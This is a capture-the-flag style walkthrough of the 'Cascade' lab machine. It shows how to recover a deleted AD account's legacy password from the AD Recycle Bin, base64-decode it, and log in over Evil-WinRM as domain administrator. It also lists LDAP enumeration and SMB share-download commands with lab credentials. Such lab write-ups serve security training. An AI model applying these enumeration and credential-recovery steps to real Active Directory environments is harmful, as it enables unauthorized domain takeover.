*Evil-WinRM* PS C:\Users\arksvc\Documents> net user arksvc
User name arksvc
Full Name ArkSvc
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/9/2020 4:18:20 PM
Password expires Never
Password changeable 1/9/2020 4:18:20 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/29/2020 9:05:40 PM
Logon hours allowed All
Local Group Memberships *AD Recycle Bin *IT
*Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
There is a feature in AD called AD recylebin and Administrator can recover the deleted address.
The command for this is . The results uploaded [here](Rchitect/deletedAD at Yoda · tcprks/Rchitect · GitHub).
Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
Some part of result looks intresting
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -filter { SAMAccountName -eq "TempAdmin" } -includeDeletedObjects -property *
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
DisplayName : TempAdmin
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName : TempAdmin
instanceType : 4
isDeleted : True
LastKnownParent : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 1/27/2020 3:24:34 AM
modifyTimeStamp : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN : TempAdmin
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132245689883479503
sAMAccountName : TempAdmin
sDRightsEffective : 0
userAccountControl : 66048
userPrincipalName : TempAdmin@cascade.local
uSNChanged : 237705
uSNCreated : 237695
whenChanged : 1/27/2020 3:24:34 AM
whenCreated : 1/27/2020 3:23:08 AM
Like previous example search for “cascadeLegacyPwd” and we got the passowrd as “YmFDVDNyMWFOMDBkbGVz”
Lets try decode and login as Administrator with decoded password
echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d 130 ⨯
baCT3r1aN00dles
┌──(rocky㉿kali)-[~]
└─$ evil-winrm -i 10.10.10.182 -P 5985 -u administrator -p 'baCT3r1aN00dles'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cascade\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/18/2022 3:32 PM 34 root.txt
The keytakeaways for exam Link to heading
During the initial enumeration we have got DC/hostname. We have got the username. However we are unable to find the SPN hashes which can help to login. Then we use the ldapsearch comamnd in deatil to get more parameters.
**ldapsearch -h 10.10.10.182 -x -b "DC=cascade,DC=local" > ldap-entry**
**ldapsearch -h 10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=person)' > ldap-person**
The first user “s.smith” seems like a Audit user which dont have much privilege. So once we get an initial shell use the commands to understand the privilege of user. In this way we can undersatnd that we need to esclate the privilege to one more user before getting the Administrator access. The below command clearly shows he is only member of Audit group.
*Evil-WinRM* PS C:\Users\Administrator\Desktop> net user s.smith
Local Group Memberships *Audit Share *IT
*Remote Management Use
Global Group memberships *Domain Users
*Evil-WinRM* PS C:\Users\Administrator\Desktop> net localgroup "Audit Share"
Alias name Audit Share
Comment \\Casc-DC1\Audit$
Members
-------------------------------------------------------------------------------
s.smith
The command completed successfully.
AD recycle bin is another intresting takeaway learning. It helps to recover the delted items. In this case from the SMB shares notes, we have seen that the “tempadmin” was deleted and even the orginal “Administrator” uses the same password as deleted “tempadmin”
smbclient --user r.thompson //10.10.10.182/data rY4n5eva
Try "help" to get a list of possible commands.
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \Contractors\*
NT_STATUS_ACCESS_DENIED listing \Finance\*
NT_STATUS_ACCESS_DENIED listing \Production\*
NT_STATUS_ACCESS_DENIED listing \Temps\*
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as IT/Email Archives/Meeting_Notes_June_2018.html (12.0 KiloBytes/sec) (average 12.0 KiloBytes/sec)
getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log (6.2 KiloBytes/sec) (average 9.1 KiloBytes/sec)
getting file \IT\Logs\DCs\dcdiag.log of size 5967 as IT/Logs/DCs/dcdiag.log (24.7 KiloBytes/sec) (average 14.8 KiloBytes/sec)
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as IT/Temp/s.smith/VNC Install.reg (12.8 KiloBytes/sec) (average 14.3 KiloBytes/sec)
smb: \> exit
Remember the commands helpful for recoving AD recylebin. Look for “cascadeLegacyPwd” in the command output and decode with base 64 command ““echo “xxxxxxx” | base64 -d””
**Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects**
**Get-ADObject -filter { SAMAccountName -eq "TempAdmin" } -includeDeletedObjects -property ***
Where (TempAdmin) is the username i found from first commands.